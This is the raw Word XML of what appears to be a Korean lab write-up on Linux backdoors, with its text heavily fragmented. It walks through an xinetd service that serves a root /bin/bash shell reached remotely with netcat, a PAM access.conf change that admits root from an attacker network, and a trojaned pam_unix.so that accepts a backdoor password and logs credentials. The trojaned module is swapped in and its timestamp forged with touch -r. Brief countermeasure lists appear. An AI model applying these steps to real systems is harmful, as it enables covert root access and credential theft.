          <w:p w14:paraId="5F3A58F9" w14:textId="77777777" w:rsid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cd /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.d</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="558F38C7" w14:textId="205FC661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xinetd.d</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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]# ls</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72820C39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chargen-dgram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daytime-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stream  echo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dgram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cpmux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-server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="021BD00F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chargen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stream  discard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dgram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echo-stream  time-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dgram</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="000991EA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daytime-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dgram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discard-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stream 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sync</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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time-stream</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DC40025" w14:textId="0A2F75E9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xinetd.d</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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]# cp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sy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ftp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007950B5" w14:paraId="0D164AD4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072AB960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0CDDD164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83275AB" w14:textId="77777777" w:rsid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ftp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설정</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72DC6A10" w14:textId="719BBC60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6951B055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E96B4C5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service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ftp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ab/>
              <w:t>#변경</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76A1DA2E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{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ab/>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A3C1737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disable = no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ab/>
              <w:t># 변경</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E53603D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flags           = REUSE   # 변경</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F9FD408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socket_type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= stream</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="419628DF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wait            = no</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38AAD76B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user            = root</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D16E6A3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server          = /bin/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bash  #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/bin/bash를 실행시킨다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="429AA89F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log_on_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failure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+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=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USERID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="4243B873" w14:textId="77777777" w:rsidR="007950B5" w:rsidRPr="007950B5" w:rsidRDefault="007950B5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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C48A0E7" w14:textId="3B07E1B4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xinetd.d</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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]# service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restart</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007950B5" w14:paraId="0A0184FA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11E49A56" w14:textId="12828EA2" w:rsidR="007950B5" w:rsidRP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 w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>실행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전</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007950B5" w14:paraId="65C4FD21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5A21DBD0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xinetd.d</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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]# netstat -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antup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| grep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</w:p>
          <w:p w14:paraId="62800ECF" w14:textId="5FFAA9FB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tcp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       0      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0 :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>::69                       :::*                        LISTEN      38335/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xinetd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007950B5" w14:paraId="05E5AAB3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08BFFEB" w14:textId="317121F7" w:rsidR="007950B5" w:rsidRP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 w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>공격자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PC(칼리 리눅스)에서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netcat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) 기능을 이용함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7950B5">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>= 원격에서 root 계정에 대한 로그인 없이 바로 계정을 사용할 수 있음</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007950B5" w14:paraId="561A26E7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3C33AA15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07950B5">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>kali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192.168.0.166 69</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2510CBF6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7950B5">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>nc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007950B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106D582A" w14:textId="77777777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A966128" w14:textId="4DDBF4C9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id 확인 시 root로 보임</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007950B5" w14:paraId="7A702DE6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4B5441E1" w14:textId="1E5C34C4" w:rsidR="007950B5" w:rsidRPr="007950B5" w:rsidRDefault="007950B5" w:rsidP="00836B5D">
            <w:pPr>
              <w:pStyle w:val="a5"/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1511D28A" w14:textId="77777777" w:rsidTr="002761E0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0E3EAA24" w14:textId="5E792B8C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7950B5">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>보안 대책</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007950B5" w14:paraId="1C69EAAE" w14:textId="77777777" w:rsidTr="007950B5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5260FB2C" w14:textId="725DA04B" w:rsidR="007950B5" w:rsidRPr="007950B5" w:rsidRDefault="006830B9" w:rsidP="00836B5D">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20"/>
              </w:numPr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7950B5" w:rsidRPr="007950B5">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>방화벽으로 서비스 포트만 허용</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D90BB1F" w14:textId="40AE1B64" w:rsidR="007950B5" w:rsidRPr="007950B5" w:rsidRDefault="006830B9" w:rsidP="00836B5D">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20"/>
              </w:numPr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7950B5" w:rsidRPr="007950B5">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>불필요하게 오픈 되어 있는 포트를 찾아서 점검</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DB7BA11" w14:textId="568017D1" w:rsidR="007950B5" w:rsidRPr="007950B5" w:rsidRDefault="006830B9" w:rsidP="00836B5D">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20"/>
              </w:numPr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7950B5" w:rsidRPr="007950B5">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>무결성 점검 도구 사용</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007950B5" w14:paraId="7E3E6F95" w14:textId="77777777" w:rsidTr="00ED11CF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53299B7A" w14:textId="5CBE3E8D" w:rsidR="007950B5" w:rsidRP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1C575097" w14:textId="77777777" w:rsidR="00ED11CF" w:rsidRDefault="00ED11CF"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7950B5" w14:paraId="188562B1" w14:textId="77777777" w:rsidTr="006830B9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6BE95CB" w14:textId="5798CF58" w:rsidR="007950B5" w:rsidRPr="007950B5" w:rsidRDefault="00836B5D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BA7FAAE" wp14:editId="6648B515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53" name="직사각형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DE4A5" id="직사각형 53" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:.35pt;width:533.25pt;height:766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Da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Z3sU6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6830B9">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>5)</w:t>
            </w:r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 xml:space="preserve">Remote Backdoor - PAM을 이용 원격 접속 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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>(2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007950B5" w14:paraId="1A33E462" w14:textId="77777777" w:rsidTr="006830B9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</w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="13AACAD4" w14:textId="77777777" w:rsidR="007950B5" w:rsidRPr="007950B5" w:rsidRDefault="007950B5" w:rsidP="00836B5D">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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7B90C917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45FE4C9" w14:textId="77777777" w:rsidR="006830B9" w:rsidRDefault="006830B9" w:rsidP="00836B5D">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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shd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PAM 설정</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D20BA1D" w14:textId="4DD8E955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shd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006830B9" w14:paraId="29C2F695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17ED51F" w14:textId="3DF6539B" w:rsidR="006830B9" w:rsidRPr="007950B5" w:rsidRDefault="006830B9" w:rsidP="00836B5D">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="23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69B2213" wp14:editId="27A69D89">
                  <wp:extent cx="4895850" cy="7715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9" w14:paraId="758E05FD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41323D29" w14:textId="351E8D2C" w:rsidR="006830B9" w:rsidRPr="006830B9" w:rsidRDefault="006830B9" w:rsidP="00836B5D">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22"/>
              </w:numPr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ccess.conf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수정</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F613286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&gt; 공격자의 네트워크에서 root로 접근하면 허용한다</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70F15670" w14:textId="2C521BBD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ccess.conf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006830B9" w14:paraId="3BF70562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6A403325" w14:textId="79C140F2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2210C2B" wp14:editId="4E4CF78A">
                  <wp:extent cx="6496050" cy="962025"/>
                  <wp:effectExtent l="0" t="0" r="0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9" w14:paraId="5ACD0CEF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488F5E9" w14:textId="55DC9C35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 w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>원격</w:t>
            </w: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접속</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3701CAC7" w14:textId="254ED06D" w:rsidR="006830B9" w:rsidRPr="006830B9" w:rsidRDefault="006830B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- 비밀번호를 NULL값을 제외한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임의의값을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주어 로그인</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED11CF" w14:paraId="30A5C034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21861A25" w14:textId="77777777" w:rsidR="00ED11CF" w:rsidRPr="006830B9" w:rsidRDefault="00ED11CF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587A0F05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553B2151" w14:textId="1D4FD0CF" w:rsidR="006830B9" w:rsidRPr="006830B9" w:rsidRDefault="006830B9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232C500" wp14:editId="2B1D4794">
                  <wp:extent cx="3476625" cy="390525"/>
                  <wp:effectExtent l="0" t="0" r="952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1CF" w:rsidRPr="006830B9" w14:paraId="3657B7FB" w14:textId="77777777" w:rsidTr="008C29A8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0DDB6FAB" w14:textId="0A143F58" w:rsidR="00ED11CF" w:rsidRPr="006830B9" w:rsidRDefault="00ED11CF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응 방안</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED11CF" w14:paraId="44B2D92C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8110387" w14:textId="77777777" w:rsidR="00ED11CF" w:rsidRDefault="00ED11CF" w:rsidP="00ED11CF">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED11CF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>PAM(Pluggable Authentication Modules)은 애플리케이션과 서비스에 대한 동적 인증을 제공</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="221418EC" w14:textId="39599FA5" w:rsidR="00ED11CF" w:rsidRDefault="00ED11CF" w:rsidP="00ED11CF">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED11CF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>주요 인증 모듈인 pam_unix.so은 etc/passwd, /etc/shadow 파일과 비교하여 패스워드 인증을 검증</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>한다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="267245D4" w14:textId="4501C529" w:rsidR="00ED11CF" w:rsidRDefault="00ED11CF" w:rsidP="00ED11CF">
            <w:pPr>
              <w:jc w:val="left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8024850" wp14:editId="1A9CFCF5">
                  <wp:extent cx="4371975" cy="17526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pam </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>주요 모듈 위치</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B45FEB4" w14:textId="77777777" w:rsidR="002E4430" w:rsidRDefault="002E4430" w:rsidP="00ED11CF">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="466B47CE" w14:textId="4A6B8CA1" w:rsidR="002E4430" w:rsidRPr="002E4430" w:rsidRDefault="00ED11CF" w:rsidP="00ED11CF">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED11CF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">pam_unix.so 파일을 변조하는 백도어 예시다. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F96F6BC" w14:textId="2C9725BC" w:rsidR="002E4430" w:rsidRDefault="002E4430" w:rsidP="00ED11CF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am </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>버전 확인</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2046518A" w14:textId="26A83739" w:rsidR="00ED11CF" w:rsidRDefault="002E4430" w:rsidP="00ED11CF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B576B" wp14:editId="31356D90">
                  <wp:extent cx="3571875" cy="7620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1CF" w14:paraId="43C98340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3FFA9801" w14:textId="77777777" w:rsidR="00ED11CF" w:rsidRDefault="00ED11CF" w:rsidP="00ED11CF">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0831D3D3" w14:textId="5DE05299" w:rsidR="002E4430" w:rsidRDefault="002E4430" w:rsidP="00ED11C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am </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>소스 다운로드</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30ED134D" w14:textId="6B464F8B" w:rsidR="002E4430" w:rsidRDefault="002E4430" w:rsidP="00ED11CF">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t># w</w:t>
            </w:r>
            <w:r w:rsidRPr="002E4430">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>get </w:t>
            </w:r>
            <w:hyperlink r:id="rId28" w:history="1">
              <w:r w:rsidRPr="002E4430">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                  <w:noProof/>
                </w:rPr>
                <w:t>http://www.linux-pam.org/library/Linux-PAM-1.1.8.tar.gz</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="251C8192" w14:textId="77777777" w:rsidR="00342D72" w:rsidRDefault="002E4430" w:rsidP="00ED11C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#</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="002E4430">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">tar xvzf Linux-PAM-1.1.8.tar.gz </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="446EF9AE" w14:textId="685A044C" w:rsidR="002E4430" w:rsidRDefault="00342D72" w:rsidP="00ED11CF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# </w:t>
            </w:r>
            <w:r w:rsidR="002E4430" w:rsidRPr="002E4430">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>cd Linux-PAM-1.1.8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E0D765E" w14:textId="0453F9A3" w:rsidR="002E4430" w:rsidRDefault="00342D72" w:rsidP="00ED11CF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#</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> vim modules/pam_unix/pam_unix_auth.c</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1322D73F" w14:textId="54AFA940" w:rsidR="002E4430" w:rsidRDefault="002B4D4C" w:rsidP="00ED11CF">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:noProof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A1B88B1" wp14:editId="28AF5A47">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="margin">
                        <wp:posOffset>-5715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0B50" id="직사각형 9" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:-4.5pt;margin-top:.35pt;width:533.25pt;height:766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E4430">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>원본코드</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65929776" w14:textId="428A5FD3" w:rsidR="002E4430" w:rsidRDefault="002E4430" w:rsidP="00ED11CF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B07DB" wp14:editId="5DB92D1B">
                  <wp:extent cx="5505450" cy="533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6F107" w14:textId="5548609F" w:rsidR="002E4430" w:rsidRDefault="002E4430"/>
    <w:p w14:paraId="5D992D78" w14:textId="77777777" w:rsidR="002E4430" w:rsidRDefault="002E4430">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>수정코드</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B711E8" w14:textId="77777777" w:rsidR="002E4430" w:rsidRDefault="002E4430">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F3D16E7" wp14:editId="55A46CFD">
            <wp:extent cx="5676900" cy="1905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46CA" w14:textId="73DA70FF" w:rsidR="00342D72" w:rsidRDefault="002E4430">
      <w:r w:rsidRPr="002E4430">
        <w:t xml:space="preserve">리눅스 PAM의 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E4430">
        <w:t>pam_unix_auth.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E4430">
        <w:t xml:space="preserve"> 파일에 백도어용 패스워드를 추가하고, 로그인에 성공한 아이디와 패스워드를 특정 파일에 저장하도록 소스코드를 삽입</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>하는 코드이다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39651718" w14:textId="50EEA44D" w:rsidR="00342D72" w:rsidRDefault="00342D72">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t># .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">/configure &amp;&amp; make </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>명령어로 파일을 생성한다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA920AB" w14:textId="1402F7F1" w:rsidR="002E4430" w:rsidRDefault="002E4430"/>
    <w:p w14:paraId="66D50C19" w14:textId="7DAB765A" w:rsidR="002E4430" w:rsidRDefault="002E4430">
      <w:r w:rsidRPr="002E4430">
        <w:t xml:space="preserve">공격자는 정상 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E4430">
        <w:t>pam_unix.so</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E4430">
        <w:t xml:space="preserve"> 파일을 변조한 파일로 교체하며, 관리자가 변조 사실을 쉽게 인지할 수 없도록 정상 파일의 수정 시간과 동일하게 설정한다. </w:t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C29A8" w:rsidRPr="006830B9" w14:paraId="402C46F8" w14:textId="77777777" w:rsidTr="008C29A8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6D03DF4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.orig</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="5DE5AED4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stat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</w:p>
          <w:p w14:paraId="4F70D827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File: `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'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3721218A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Size: 57728     </w:t>
            </w:r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  <w:t>Blocks: 120        IO Block: 4096   일반 파일</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D108F04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Device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802h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2050d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Inode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: 17396381    Links: 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F4B44CC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(0755/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w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x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) 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: (    0/    root)   Gid: (    0/    root)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="159B36BB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Context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system_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u:object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_r:lib_t:s0</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="7E8F57A1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2020-12-16 15:00:01.510334880 +0900</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C21C86D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Modify: 2018-04-11 12:22:10.000000000 +0900</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1712F111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Change: 2020-09-15 10:35:51.128329732 +0900</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CB6C921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Birth: -</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B4EDA6C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.orig</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="3B1E1622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touch -r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.orig</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="0C43F956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cp modules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.libs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</w:p>
          <w:p w14:paraId="26C109B2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cp: overwrite `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'? y</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="569DC702" w14:textId="4ADBABDA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8]# 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stat /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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        &gt;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내가 새로 생성하여 기존파일 과 위치를 바꾼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파일</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DE86D4B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File: `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'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58B5C0B8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Size: 193352    </w:t>
            </w:r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  <w:t>Blocks: 384        IO Block: 4096   일반 파일</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FAF3107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Device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802h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2050d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Inode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: 17396381    Links: 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EF8BFC0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(0755/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w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x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) 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: (    0/    root)   Gid: (    0/    root)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77E0D2EE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Context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system_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u:object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_r:lib_t:s0</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="0708FEC8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2020-12-16 15:00:01.510334880 +0900</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F22FE1E" w14:textId="77777777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Modify: 2020-12-17 14:46:39.286019973 +0900</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C7BBF54" w14:textId="3AC4E52B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lastRenderedPageBreak/>
              <w:t>Change: 2020-12-17 14:46:39.286019973 +0900</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3267F23A" w14:textId="224217EC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Birth: -</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58C46686" w14:textId="5B1D4CBC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19DF927" w14:textId="6A76775F" w:rsid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touch -r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.orig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</w:p>
          <w:p w14:paraId="0FD7CC0B" w14:textId="436A50E6" w:rsidR="008C29A8" w:rsidRPr="008C29A8" w:rsidRDefault="008C29A8" w:rsidP="008C29A8">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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기존 파일의 파일정보를 내가 생성한 파일에 덮어 씌운다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="246BF1CF" w14:textId="32ADAA85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oot@CS7-166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Linux-PAM-1.1.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8]#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stat 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</w:p>
          <w:p w14:paraId="5C286538" w14:textId="36DF700B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File: `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s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lib64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security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pam_unix.so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'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14C00494" w14:textId="27AE04CF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 Size: 193352    </w:t>
            </w:r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  <w:t>Blocks: 384        IO Block: 4096   일반 파일</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="257C5ADD" w14:textId="4CEECCE3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Device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802h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2050d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Inode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: 17396381    Links: 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EB6937F" w14:textId="7A343F13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(0755/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rw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xr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008C29A8">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>-x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) 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: (    0/    root)   Gid: (    0/    root)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D45465B" w14:textId="5B3D8712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Context: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008C29A8">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>system_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008C29A8">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>u:object</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008C29A8">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>_r:lib_t:s0</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="55A8D504" w14:textId="08E6F3E8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Access: 2020-12-16 15:00:01.510334880 +0900</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4900F0FD" w14:textId="35F7B7FC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Modify: 2018-04-11 12:22:10.000000000 +0900</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="442A0163" w14:textId="61F91165" w:rsidR="008C29A8" w:rsidRP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>Change: 2020-12-17 14:49:14.845927422 +0900</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58D00A69" w14:textId="1438BF27" w:rsidR="008C29A8" w:rsidRDefault="008C29A8" w:rsidP="008C29A8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C29A8">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> Birth: -</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
